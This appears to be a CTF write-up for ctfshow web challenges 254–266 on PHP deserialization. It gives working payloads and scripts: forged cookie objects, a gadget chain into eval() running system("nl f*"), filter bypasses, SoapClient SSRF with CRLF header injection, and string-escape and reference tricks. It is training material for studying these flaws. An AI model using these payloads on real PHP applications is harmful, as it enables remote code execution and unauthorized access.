The headache of serialization is here; it brings back the dread of being at the mercy of code auditing. Painful.
web254
?username=xxxxxx&password=xxxxxx
One small point worth knowing: `public function` versus plain `function`. In PHP a method declared without a visibility keyword is public by default, so the two forms are equivalent here.
web255
Cheat sheet:
<?php
class ctfShowUser {
    public $isVip = true;
}
echo serialize(new ctfShowUser);

Output:
O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
URL-encoded payload:
GET: ?username=xxxxxx&password=xxxxxx
Cookie: user=O:11:"ctfShowUser":1:{s:5:"isVip"%3Bb:1%3B}
The `;` inside the cookie value has to be sent as %3B because `;` is the separator between cookies; PHP URL-decodes the values in $_COOKIE, so the server still sees the original serialized string.
web256
Cheat sheet:
Everything else is the same as above; only username has to differ from password.
<?php
class ctfShowUser {
    public $isVip = true;
    public $username = 'x';
}
echo serialize(new ctfShowUser);

Output:
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:1:"x";}
URL-encoded payload:
GET: ?username=x&password=xxxxxx
Cookie: user=O:11:"ctfShowUser":2:{s:5:"isVip"%3Bb:1%3Bs:8:"username"%3Bs:1:"x"%3B}
web257
Cheat sheet:
__construct runs automatically when an object is created and initialises it. __destruct runs when the object is released, that is, when the last reference to it goes away (at the latest when the script finishes).
Deserialization on PHP 7.1+ is not sensitive to property visibility: a payload that names a property the way a public property is serialized still fills a private or protected property of the same name.
So when serializing locally, simply change the original `private` to `public`; that avoids the mangled `\0ClassName\0prop` names and the payload still lands in the private properties.
See this article: https://hellohy.top/huayang/711.html
The idea: the executable sink is eval(). To reach eval() we need backDoor::getInfo() to run; getInfo() is only called from ctfShowUser::__destruct, and __destruct fires once every reference to the deserialized object has been released. So the payload is a ctfShowUser whose `class` property holds a backDoor whose `code` property is the command to run.
<?php
class ctfShowUser {
    public $class;
    public function __construct() {
        $this->class = new backDoor();
    }
}
class backDoor {
    public $code = 'system("nl f*");';
}
$b = new ctfShowUser();
echo urlencode(serialize($b));
O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22system%28%22nl+f%2A%22%29%3B%22%3B%7D%7D
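As an added, self-contained check (my own demo code, not the challenge source or the author's script): the two classes below imitate the shape described above, with `class` and `code` declared private and the method bodies assumed. The payload is built with public-style keys exactly as the page does, and the script confirms through reflection that the private property was still populated, then drops the last reference so that __destruct -> getInfo() -> eval() fires. The eval'd code is a harmless echo rather than system("nl f*").

```php
<?php
// Added demo for web257, not the challenge's source: class and method names follow
// the page, bodies are assumptions. It shows (1) a payload written with public-style
// keys still fills PRIVATE properties on PHP >= 7.1, and (2) __destruct runs when the
// last reference to the object is dropped, which is what reaches eval().

class ctfShowUser {
    private $class;                        // private here; public in the local copy used to build payloads
    public function __destruct() {
        $this->class->getInfo();           // the only call site of getInfo()
    }
}

class backDoor {
    private $code;
    public function getInfo() {
        eval($this->code);                 // sink: $code is attacker data taken from the payload
    }
}

// Build the payload the way the page does, with the public-style key s:5:"class".
// serialize() of the real private property would instead emit s:18:"\0ctfShowUser\0class".
function buildPayload(string $code): string {
    $inner = sprintf('O:8:"backDoor":1:{s:4:"code";s:%d:"%s";}', strlen($code), $code);
    return sprintf('O:11:"ctfShowUser":1:{s:5:"class";%s}', $inner);
}

$payload = buildPayload('echo "getInfo() reached through __destruct", PHP_EOL;');
echo $payload, PHP_EOL;

$obj = unserialize($payload);

// (1) the private property was populated despite the public-style key
$rp = new ReflectionProperty($obj, 'class');
$rp->setAccessible(true);                  // required before PHP 8.1, a no-op afterwards
printf("private \$class holds a backDoor: %s\n",
    var_export($rp->getValue($obj) instanceof backDoor, true));

// (2) dropping the last reference runs __destruct -> getInfo() -> eval()
unset($obj);
```

Run it with `php demo.php`: the reflection line reports true, and the echo inside the eval'd string appears only after `unset($obj)`, which is the moment the challenge's real payload would execute its system() call.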
web258
Now there is a filter.
Reading the pattern: `[oc]` matches one of the characters inside the brackets, `\d` matches a digit and `+` means at least one of the preceding item, so `[oc]:\d+:` is aimed at the `O:11:` header of a serialized object.
Just change every `O:` in the payload generated above to `O:+`. unserialize() accepts an optional `+` sign in front of the length, while `:\d+` in the pattern no longer matches because a `+` now sits between the colon and the digits. The replacement has to hit both headers, the outer ctfShowUser and the nested backDoor, which str_replace() does.
<?php
class ctfShowUser {
    public $class;
    public function __construct() {
        $this->class = new backDoor();
    }
}
class backDoor {
    public $code = 'system("nl f*");';
}
$b = new ctfShowUser();
echo urlencode(str_replace('O:', 'O:+', serialize($b)));
web259
This one is too hard; here is 羽师傅's solution.
<?php
$target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null, array(
    'location'   => $target,
    // CRLF injection through the User-Agent: extra headers, a blank line, then a POST body.
    // '^^' is a placeholder that is swapped for "\r\n" after serialization.
    'user_agent' => 'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'
                  . '^^Content-Length: ' . (string) strlen($post_string) . '^^^^' . $post_string,
    'uri'        => "ssrf"
));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo urlencode($a);
?>
O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
Submit this once first. SoapClient has no method of its own matching what the target calls on the deserialized object, so the call lands in SoapClient::__call, which issues an HTTP POST to `location`; the CRLF sequences inside `user_agent` smuggle an X-Forwarded-For header, a Content-Type and a Content-Length followed by the body `token=ctfshow` into that request, so flag.php receives what looks like a local POST with the right token.
Then visit /flag.txt.
web260
After serialization
web262
You can tell it is a string-escape (length-change) attack, but I just can't do it.
Somewhat harder than the first challenge of the Mooncake Cup.
If you haven't met the technique before, read: https://hellohy.top/huayang/981.html
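Since the page only names the technique, here is an added stand-alone demo of serialization string escape (my own code, not the challenge's source; the class, its property names and the filter are assumptions). A filter that runs after serialize() and replaces a 4-byte word with a 5-byte word stretches the data while the declared `s:N:` length stays put, so the parser stops early inside attacker-controlled text and the bytes that follow are read as the next property:

```php
<?php
// Added demo of serialization string escape (the technique named for web262),
// not the challenge's source. Class, property names and the filter are assumptions.
// The filter replaces "fuck" (4 bytes) with "loveU" (5 bytes) AFTER serialize(),
// so every hit stretches the data by one byte while the declared length stays put.

class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';     // the field the user is not supposed to control
    public function __construct($from, $msg, $to) {
        $this->from = $from;
        $this->msg  = $msg;
        $this->to   = $to;
    }
}

function filter(string $s): string {
    return str_replace('fuck', 'loveU', $s);    // +1 byte per occurrence
}

// Server side (assumed): serialize the user's input, filter it, then unserialize it later.
function serverSide(string $from, string $msg, string $to): message {
    $stored = filter(serialize(new message($from, $msg, $to)));
    return unserialize($stored);
}

// Attacker side: append the fragment we want parsed as a property, and prepend
// as many "fuck" as the fragment is long. After the filter the declared length
// of $to covers exactly the N copies of "loveU", so the parser continues into
// our fragment and token becomes "admin". The original ;s:5:"token";s:4:"user";}
// ends up after the closing brace as trailing data, which unserialize() ignores
// (PHP 8.3 and later emit a warning about it but still return the object).
$inject = '";s:5:"token";s:5:"admin";}';
$to     = str_repeat('fuck', strlen($inject)) . $inject;

$honest = serverSide('alice', 'hi', 'bob');
$pwned  = serverSide('alice', 'hi', $to);
printf("honest token:  %s\n", $honest->token);
printf("escaped token: %s\n", $pwned->token);

// For inspection: what the stored string looks like after the filter.
echo filter(serialize(new message('alice', 'hi', $to))), PHP_EOL;
```

The count of padding words equals the length of the injected fragment because this filter grows the data by exactly one byte per hit; for a filter with a different growth you divide the fragment length by the per-hit delta, and for a filter that shrinks the data you instead swallow the start of the next property into your own string.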
web265
Use a reference.
<?php
class ctfshowAdmin {
    public $token;
    public $password;
    public function login() {
        return $this->token === $this->password;
    }
}
$a = new ctfshowAdmin();
$a->password = &$a->token;  # reference: serialize() records it as R:2; and unserialize() rebuilds it,
                            # so whatever the server assigns to token afterwards is seen through password too
echo urlencode(serialize($a));
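An added demo of why the reference survives the round trip (my own code, not the challenge's source; the server side, which overwrites token with a random value after unserialize() and then calls login(), is an assumption that the reference trick only makes sense against). It builds the payload with and without the reference and runs both through the same server-side logic:

```php
<?php
// Added demo of the reference trick for web265, not the challenge's source. The
// server side is an assumption: it overwrites token with a random value after
// unserialize() and then calls login().

class ctfshowAdmin {
    public $token;
    public $password;
    public function login(): bool {
        return $this->token === $this->password;
    }
}

function buildPayload(bool $withReference): string {
    $a = new ctfshowAdmin();
    if ($withReference) {
        $a->password = &$a->token;   // serialize() writes this as R:2; (slot 1 is the object, slot 2 is token)
    } else {
        $a->password = $a->token;    // equal right now, but two independent values
    }
    return serialize($a);
}

function serverSide(string $payload): bool {
    $u = unserialize($payload);
    $u->token = md5((string) mt_rand());   // attacker never learns this value...
    return $u->login();                    // ...but with a reference, password tracks it
}

foreach ([false, true] as $ref) {
    $payload = buildPayload($ref);
    printf("%-56s login=%s\n", $payload, var_export(serverSide($payload), true));
}
```

The payload with the reference serializes as `O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}`; the `R:2;` entry is what makes unserialize() bind password to the same zval as token, so the server's later assignment lands in both.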
web266
<?php
class ctfshow {}
$a = new ctfshow();
echo strtoupper(serialize($a));

Output:
O:7:"CTFSHOW":0:{}
Wrap the result in strtoupper() to get past the regex: PHP class names are case-insensitive, so unserialize() still instantiates ctfshow from the uppercased name.
There is no parameter to put it in, so send it as the raw request body in Burp.
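One added example covering both filter bypasses on this page, the `O:+` trick from web258 and the uppercase class name from web266 (my own code, not the challenges' source; the two filter patterns, `/[oc]:\d+:/i` and a case-sensitive `/ctfshow/`, are assumptions reconstructed from the page's description). It also shows the limit of strtoupper(): it only works when the payload consists of nothing but an object header.

```php
<?php
// Added demo, not the challenges' source. The two filters are assumptions:
// web258 is described as matching [oc] ":" \d+ ":" (the serialized object header),
// web266 is assumed to be a plain case-sensitive match on "ctfshow".

class ctfShowUser { public $isVip = true; }
class ctfshow {}

function web258Filter(string $s): bool {        // true = request blocked
    return preg_match('/[oc]:\d+:/i', $s) === 1;
}
function web266Filter(string $s): bool {        // true = request blocked
    return preg_match('/ctfshow/', $s) === 1;
}

// --- web258: break ":\d+" with the optional '+' sign unserialize() allows before a length ---
$plain  = serialize(new ctfShowUser);           // O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
$bypass = str_replace('O:', 'O:+', $plain);     // O:+11:"ctfShowUser":1:{s:5:"isVip";b:1;}
printf("web258 plain blocked: %s, bypass blocked: %s\n",
    var_export(web258Filter($plain), true), var_export(web258Filter($bypass), true));
$obj = unserialize($bypass);
printf("web258 rebuilt as %s with isVip=%s\n", get_class($obj), var_export($obj->isVip, true));

// --- web266: class names are case-insensitive, the filter is not ---
$upper = strtoupper(serialize(new ctfshow));    // O:7:"CTFSHOW":0:{}
printf("web266 blocked: %s\n", var_export(web266Filter($upper), true));
printf("web266 rebuilt as %s\n", get_class(unserialize($upper)));

// Caveat: strtoupper() is only safe for a bare object header. The other type tags of
// the format are lowercase ("b:", "i:", "a:", "s:"), and property names are case-sensitive.
// Here "b:1;" turns into "B:1;", which unserialize() rejects, so the result is false.
$broken = strtoupper(serialize(new ctfShowUser));
printf("uppercasing a payload with fields: %s -> %s\n",
    $broken, var_export(@unserialize($broken), true));
```

The `@` only silences the "Error at offset" notice for the deliberately broken case; the point of that last line is that the uppercase bypass and the `O:+` bypass are not interchangeable, since one survives only when the payload carries no typed fields, while the other leaves every field intact.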
FROM:浅浅淡淡[hellohy]